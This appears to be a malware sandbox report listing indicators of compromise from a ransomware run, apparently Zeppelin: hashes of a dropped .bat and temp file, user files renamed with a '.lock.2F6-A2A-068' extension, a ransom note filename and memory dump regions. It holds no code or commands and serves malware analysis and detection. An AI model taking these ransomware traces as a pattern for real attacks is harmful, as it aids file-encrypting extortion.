Download Submit
C:\Users\Admin\AppData\Local\Temp\wct5E6B.tmp

Filesize
64KB

MD5
9a520288f2fdc542a79761f520fe6edc

SHA1
eea2a3107215ddba379f3461e52d00f7e134bf97

SHA256
11705af5a186ade81bab11d2ae42fbb2c044760ad16230982902442b435235e1

SHA512
c562903f1c42f74b7fcf2f40389cf89ace85cf1d9f4a7806cedb5277ec89bd7efe8005712eba0ef8b6407c0135ba8ff77fc5203be79446bc5460b8b2170bfa88

Download Submit
C:\Users\Admin\AppData\Local\Temp\~temp001.bat

Filesize
10KB

MD5
0d0bd9b3d068d303baace9d289906182

SHA1
15e9b273494cd57a8e5b12b8f821019a49bcf983

SHA256
779735a7b4cab272dde5f971d743d7ac9c6925b437dba5f6478757f696958d1e

SHA512
76d96eb2aec728acb8f401532964346f82c4e0cf250dbac25485839e75fdab790be877fdf2f734c3acff8aa4e830efb4960cddf7490e75749ee09afeaa629325

Download Submit
C:\Users\Admin\Desktop\CompareConvert.ini.lock.2F6-A2A-068

Filesize
294KB

MD5
723ab409168246834cc7f2a9cb4a8d29

SHA1
b904429aa1082da8092603355fe725d5cb452ad0

SHA256
23665c7fc543e5058dbd3573a37eb2219730c16e8ed33f840c6dffde258c2fa5

SHA512
227f949c22e8da563d8e3edcd3d4ed0f1f74d4a1ab85454bdf25056b43d153e2ff1e809a22342822b3cb3683073b98a0cab40430e2cac2fac4c5a98c1274c445

Download Submit
C:\Users\Admin\Desktop\CompareSwitch.wmf.lock.2F6-A2A-068

Filesize
273KB

MD5
8efd7b884f39df480377080a603da4cf

SHA1
ffdd5489cbfeda2102e443307251ccabe2fc673a

SHA256
4e1842f544e1d35fe064c6cb51868db22baaffb41c557a163c9967f94a62f6d8

SHA512
405833c8e79e15dbed2266cf7f10454f3e8442062a3df61688409a5e365c9d4b2d0f7228862cefe8740ff30f00e4f1b86166053bf40690614026a4974447ff7b

Download Submit
C:\Users\Admin\Desktop\ConvertFromApprove.mht.lock.2F6-A2A-068

Filesize
252KB

MD5
f138c60f26d0aa73031b6849c4eeab77

SHA1
5e782a45ecfd9767a3306fff270cff7709c564b8

SHA256
9e5ff9797b0d9bd4f606dc92995104137c23eb46f264fc9667d86e92e7bda9f7

SHA512
cc494f40d28238cf84eaf35357050fd8ef3f08546a02440c91d82415fe690f99d315f36ed40216a725058dc261c2151d84e389f99d0b0100d132911f37e3529d

Download Submit
C:\Users\Admin\Desktop\ConvertFromOut.dib.lock.2F6-A2A-068

Filesize
179KB

MD5
1c4e4f42472b34aceaf963cbe52e50d4

SHA1
774ea7c1448c1d75276e6c7603bcca4a805ce100

SHA256
e40904006bde1e146f8f80b9756aa3cf0a481d1af393ac52779cf652c71fa86a

SHA512
d5f919ba7aa7018fc280ecd888506749cea39dda49c4a456bd4f7e479b381cf7d24376f31b4e4ef9745491cff81189a44b5987a5e93f1018be68966db7428f95

Download Submit
C:\Users\Admin\Desktop\ConvertToSkip.xla.lock.2F6-A2A-068

Filesize
304KB

MD5
4da39f6d387dd425a069e345b6ac3f9b

SHA1
25151591d811c505fe339398ab1fe9a43c42e5bb

SHA256
b60fd2289a7afec122030c1c81899476d04a8c8e9f427e3bc233a7b0a9a5a788

SHA512
219a3be0065f2da93b096ad73b130065c5cca2a40b065d40698d246cc95d306264eb12083276f3c08546f01da6c73195f95bcf883465afc965a50b32942ab4fc

Download Submit
C:\Users\Admin\Desktop\DismountOptimize.dwfx.lock.2F6-A2A-068

Filesize
346KB

MD5
0de0b91bea34323eabb85153a65bcddb

SHA1
9a34eb4d5bb535062484b0474063bc878ef5c925

SHA256
5e2ca89bc732fb4f67341f7e4256459dadf4e3c942a097357ab5aa4e88766860

SHA512
3a637a97322601c682120b88522a64960109a779f05a8c27d8a11c0a470d46e70440d0cf496b344dc5cf60258a974e39dbe573bdf307ce7ad6c44c668c0e4a76

Download Submit
C:\Users\Admin\Desktop\EditUpdate.avi.lock.2F6-A2A-068

Filesize
576KB

MD5
6ac3f383db918f8873a7ea83b52bc23a

SHA1
6d3377f77dd3ad5deb409a95a666a29bb46e3218

SHA256
1297984bbaea6a5d534a3cbedce9cc3c470a99be112dc9f0762f65468e524298

SHA512
1be6e94413230329cfc153a5acd8bbeac26231dccb6768dea4cfb0ebe0e7b7f2add13a91cfad9f3414053ad5487db9d6b78c937032345ef6aa868c0cc7a97e61

Download Submit
C:\Users\Admin\Desktop\EnterRestart.vsdm.lock.2F6-A2A-068

Filesize
419KB

MD5
165641a96b2f053b6e7cfa0e6af9a64f

SHA1
7d9fcacf70952b2f719d5eacbf818b0c79399989

SHA256
f6a52975b7e068704d02739326cc83a2b8eb64a949c64eab52ef83678e0f867d

SHA512
1512b1c0d5789e0e3c1a475a2188c243d86d54c62f546251e586d12c766fd0d518143289451579469b8960c04b99c7d433e096db18b9da428e9860c8bbbf4087

Download Submit
C:\Users\Admin\Desktop\InitializeUnprotect.ps1.lock.2F6-A2A-068

Filesize
189KB

MD5
ec8702400e8f3fdf18031baff83f5bb7

SHA1
7f12cca10c78c9a2e122d88b61840aa50f653e4c

SHA256
1aa2de8ceb34ea52c2d52f24b414944066a4576257d3d95ec24be9f46a6e74d6

SHA512
e16c8301f15b0ee1a239e389420bca5df7d1c1cb8814dd536128aa3455977f3eae24a431565bb1b4076f74dc01b764765129ea41181f6da57b221313366bf26e

Download Submit
C:\Users\Admin\Desktop\InvokeCompress.mht.lock.2F6-A2A-068

Filesize
283KB

MD5
4954359263f2b5894caf72d41e4a4fd1

SHA1
e49b308da6ea1e1a616cd04b383e075c8c66ea90

SHA256
41fb1c7e3a78d675aa94cfbca20bbf2ef6fb1a047780da408670d16419977ebc

SHA512
00b4be63672f7969dfeec5dd429fac86538627f94c687133ac20db035cf16d1245def729d03cf749281d1777cc94239c06086fa33422c91d45f976c10597b235

Download Submit
C:\Users\Admin\Desktop\NewMerge.rm.lock.2F6-A2A-068

Filesize
335KB

MD5
fceea43d867784a733b22c9679e7e352

SHA1
db0fa10b912ff7840fd941e149506b64ec7209ad

SHA256
6dc2e44f3d6fa5846966ba14d6212d8a4d852c555e50fb3e1d43869bc09e06df

SHA512
1e590a9c818f879a907e590440c99ac84ec1155984662ca65fdec3f684ca084db4103c42e212e948a8ff6f57434b6af02713b199cdd349403d0a478bf2aee3bf

Download Submit
C:\Users\Admin\Desktop\OptimizeConfirm.pot.lock.2F6-A2A-068

Filesize
241KB

MD5
feb294bb1c94d70ff581107b8e86c16c

SHA1
f9a47c380ccc823fc10ad7d56673914f1e4db414

SHA256
bf33d80745ebd0bbe0ba5dbb25eb9b21f4ff86cc69c080c93fa6867f7bf707e1

SHA512
fe33ed162b1c62c26249746f78940504c2680a620523a86cafa9dff04a7d25266542702b149857a669e392536b49d3cfd5a15af2ecfc24b2d0fdf0fb6420827d

Download Submit
C:\Users\Admin\Desktop\ProtectGrant.vssx.lock.2F6-A2A-068

Filesize
14KB

MD5
42989e1f4ee34e0a8a3f38eaf7fcc9b7

SHA1
4a93c14365c1a47844079847abec5fedc610a177

SHA256
0032c476587a21e35362cc60a03d0f93169c668be23194dd165a7f4e01036e97

SHA512
6a24c54954e233d99af8c4ade47cf7ac7a697ad1248426c21ab906b17d03352052b526e887ce210b56a47ddc020c82f366f2a959b8f4dff413ef867f04ff9070

Download Submit
C:\Users\Admin\Desktop\PushTest.reg.lock.2F6-A2A-068

Filesize
356KB

MD5
7b4f64f75dd7d5936ba78647cce0dcba

SHA1
9c08c4d66db35cc6cc4fe4fc39750020cfb5174c

SHA256
f6974e6dddb622c67a1893328b4de2c3caea91d22d5b99ba87c6c30b0c1bad6b

SHA512
23e924ee3cbeb40f8994b96a5b619f83042e2970bb5b760f5b7cdf8e8e4a37c8f94125455dd10e45877035a0f027a7c969ffb96af0ed98e9e82cd26b60bc8cd2

Download Submit
C:\Users\Admin\Desktop\RegisterShow.emf.lock.2F6-A2A-068

Filesize
398KB

MD5
e3a64132f0a03e591bdbd771a1948a38

SHA1
59557167d8860becbb114995524577d96fef286b

SHA256
4898c83ce16ecb04389f1a0af977fc38d0aaa0c882433346385bc2923170bbd5

SHA512
61d37cd9ffe6dadd9af214a3ea565230fed5d7b42ae3a020c5ccab901eb34c4cecf85703508684e518e31eaece6fd0bc1b2b9d463da675cf3fbe6cf84d526cd2

Download Submit
C:\Users\Admin\Desktop\ResetPublish.tif.lock.2F6-A2A-068

Filesize
325KB

MD5
80dbeb351f6913ed4a9c09dc3c987681

SHA1
d4dd04e2c574a1b72266424ba3a3a83f74e368e7

SHA256
7a4767a9279f8f3743778fd10fa4186b5d405c06bc800153269f7e9a5700d31e

SHA512
9e269762c5a101a6eea580c4f6479cdded8356ca0dfaeedbf93d7dc0f714614d93c1d1c94b6732529cd4d6e6657d80340e5b141a8d4f6e726b005a5e63932526

Download Submit
C:\Users\Admin\Desktop\ResizeJoin.DVR.lock.2F6-A2A-068

Filesize
168KB

MD5
daf43f6a2903dd1623e8e59d030c5e61

SHA1
99850258c3af3d603db376908a5936ebf3fdf972

SHA256
711963ac21d316f0cb587d2ccbfd85ed936586f13176a0368fbbbced76ee36b7

SHA512
e1f10d7926f42842b52a37ffd16099ea67d9eb0489b88ced8b3257f2e483e167c611dd4f491675a98b90709aa2ec763ea84144839ec744897848d1de7a6704a9

Download Submit
C:\Users\Admin\Desktop\ResizeJoin.vsd.lock.2F6-A2A-068

Filesize
262KB

MD5
470b9944280875aa435d993b5aa273f7

SHA1
acbbb870cd5733af426dd2562f057ac87211ee8b

SHA256
8394f3422703433bb6a8afee41bcecc72250822f65741d47020df7634ac7fd6a

SHA512
059c5c593406cf1c81d706c17eca1e6cde8c36b9f4e808743cd1380e118da2808f9787ae79fc6412e73b0533350dd67838afbba1a55f7af516958972a2b6d5dc

Download Submit
C:\Users\Admin\Desktop\RevokeConvertTo.ppsm.lock.2F6-A2A-068

Filesize
388KB

MD5
c36deea5cc1f6a41569536ea59b68937

SHA1
a73a95cc683732f6a51284a3641a543379ec5637

SHA256
8291e708d2718f494b7f34fa7665f05bdbc40136de3e8d068bcaacee9194f236

SHA512
3b92b3dafb461c8a6be9d11c3747096e19792fdbacccafe3cab1f5f5fbe3e477f50418898e353fc6d30f325c9379899658fbe65f8a4a99d9ff397c1e9d40318d

Download Submit
C:\Users\Admin\Desktop\ShowUnprotect.jpeg.lock.2F6-A2A-068

Filesize
231KB

MD5
3d5e10e1b397265339802fe48816b698

SHA1
edfec551005f007f612db14ec92c18573be0a126

SHA256
4409c0c57bc3c62576943b1cc0f8098c5af5c1f1deca2f0568048cef59cd8361

SHA512
9b140429cc45c504e802573233d1b1c21f7e04886c03b74224c11047d993fd9f50cc196933d3c79f6ca0a818353a108012a095868e7b15318e47236a0e51871d

Download Submit
C:\Users\Admin\Desktop\SkipSearch.jtx.lock.2F6-A2A-068

Filesize
200KB

MD5
4b4c3c367de8f1d40feee911663f034f

SHA1
644379b6d3c5219b8e66a16eeb5f02371670cf97

SHA256
ac90fa931b183c96ca90c969b5358d4e3ed54441eafa49722b801ab3a1b74113

SHA512
0eba1b1e41075b47e3b4e0df73a2f8c8ba49df3f0f3179008fa294165cda217cedf26a133c392c70ee593752c9543b906401e0d894df52e60f552077502d6f5e

Download Submit
C:\Users\Admin\Desktop\SplitLimit.au.lock.2F6-A2A-068

Filesize
210KB

MD5
aef3f9eab7f2a4bb403b1cdfc9339f7c

SHA1
d61a2b44b775de690d9d8e501fa13a2ff850a76f

SHA256
dcd81595d2dfb9218a09d510c80d991d860d5159a13f6502dcf8ca161cf19bb7

SHA512
12caa17600bf77c73177b9c1f1dd6489276346b70bc6609a4d3de8898afe19c52cb72deb4471696e6f4adc8723779969686a62de0b293f760af8105acbac65e9

Download Submit
C:\Users\Admin\Desktop\StepShow.aif.lock.2F6-A2A-068

Filesize
221KB

MD5
d01446c2b4e52cf6058c75baf17a316e

SHA1
3c30673dd713869921e456d2ab4e8551725b5feb

SHA256
7e4c3dfb266738daf06c805f2480edbf8b49e710c6110e88750ad2eba92c8b76

SHA512
9ded185925479ef034a6a70bccd8296aa65937d7cc063b55f07596b7fcfdee2c407edbe633fdade223a7617b11bec450a6e4eaf519b37a9483a575bcac9e417b

Download Submit
C:\Users\Admin\Desktop\UninstallMount.xml.lock.2F6-A2A-068

Filesize
377KB

MD5
3dae21bc2729d6d4a34ec110f698cb22

SHA1
107e5fd26bd23c9beafa8c10d47c10adf20d7e2b

SHA256
59dab62b63e81745665bdb4a73fb14f24740446d77926de91a6eb8a3d6f3f211

SHA512
2acd9b1ff43e064c0f11cee507db8c35407ba58073c257eabe24bff8d0f6907491e334b7cbb6df7c8b61753a4d5fd2108b612c0c6e22fb7e1f81f5680bf0ab1a

Download Submit
C:\Users\Admin\Desktop\UnlockDeny.m3u.lock.2F6-A2A-068

Filesize
147KB

MD5
e79fa0bbc65d4166751da0a0353ac4fd

SHA1
9a7e11f4151cad4d63b996379d61db5168d11b9b

SHA256
28e7c56ac7860621c594a1f25fc78697961fac2efc23a369a89f22efbdd81364

SHA512
7532a7bc83dd85a58c0e24bec78012c4aa41133f33211a4f95bc7c2ec8c2ff401f26407054529e06a7fce622684a8d47653d43adcb5a51714066984ada1e4c15

Download Submit
C:\Users\Admin\Desktop\UnprotectGet.cab.lock.2F6-A2A-068

Filesize
367KB

MD5
2a24e9c4bc700c26fd2bba6909dfa22c

SHA1
66a1318b4c9be7740b263fdefb758f48abb40f9a

SHA256
4ee1b6b09e4d8324d2b94f89b5feb5fa2a74c3fdaf4fd2d3758b5f16719957ff

SHA512
92ee5ac1c18980ef5ac35402bee790e4228aafbd3c0eb941d2716283918f3aa688bb188040e7d2a0c27baf120e4f8210c9c3e11900acfa2d761e9861c02f1985

Download Submit
C:\Users\Admin\Desktop\UseFormat.xla.lock.2F6-A2A-068

Filesize
158KB

MD5
8c77d0c5876fb444ec58e4bc97d0680c

SHA1
5b3e650ff6b830d34d25cbdf3cd591bc7d800de4

SHA256
86ef1441a9535cea13dfe77bbdded4a19ca6aca559d2cb401a46e986ec4cac6f

SHA512
a628d89d8ccba92333882a0ad06f157c2ddfc958134c3f01aa9a7a4d30de6b80571da1ea2b8c58a8cdf8d6f618d377bed4d76344bb79d742fae6e845b717fd20

Download Submit
C:\Users\Admin\Desktop\WatchFind.mp4.lock.2F6-A2A-068

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\odt\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT

Filesize
1KB

MD5
64061ad9f8a09cb3c002165f9cba7cea

SHA1
3a9a9acda3e2197c9ca44ec211f73ed2ac87a0fe

SHA256
8cb9a36bd5f6275775ebed5ec91d18f392f41265dba542bf0412fc57e00cbd16

SHA512
f32d4cc2bdd9058fa218cecdac218229162278825fef0891ebb50429c0ab270740e35f49592c18a6fba0c5330055e31367c0aaf3cf9121ec899bd7ff2e7d283e

Download Submit
C:\vcredist2010_x86.log.html

Filesize
64KB

MD5
de1992abe5d6ede10d436c3f1a20d62b

SHA1
62e583e029d1b56ace867111bb30084442ee50e3

SHA256
ab6451153635741a7eda76f406f64d1972b16cafb29d42dabea5164ef9177c7d

SHA512
27c5b04dd4e9dda07cc916b6b0dda6cbcf8b8b34199bf4cc7637ad17344fa2ebfda83f7d91c015c58711c97a55d75335a971cd1e49785cfa57f723615a1f9fc2

Download Submit
F:\$RECYCLE.BIN\S-1-5-21-3316742141-2240921845-2885234760-1000\.Zeppelin

Filesize
513B

MD5
6799d4f62f9e733aeb91274b08a7140b

SHA1
2375f33c989b703bf051fc19f521f609ce022581

SHA256
8327c4a7afa309796a218aa0735417bac9a64326235f9f3c9cc1bc9407de3999

SHA512
3c8cf4706d249b2c4b793ff278c0827b3df515f4d55d83d143cd9ada663dcfdaa8ccc811209e7a8b3ce97d5beb13f76522148dd8a2108bd44488133256ca2953

Download Submit
memory/1972-29018-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download
memory/3276-29019-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download
memory/3276-22511-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download
memory/3276-2-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download
memory/3276-7607-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download
memory/3668-51-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download
memory/4280-19235-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download
memory/4280-9246-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download
memory/4280-24295-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download
memory/4280-13772-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download
memory/4280-15724-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download
memory/4280-28989-0x0000000000AD0000-0x0000000000C14000-memory.dmp

Filesize
1.3MB

Download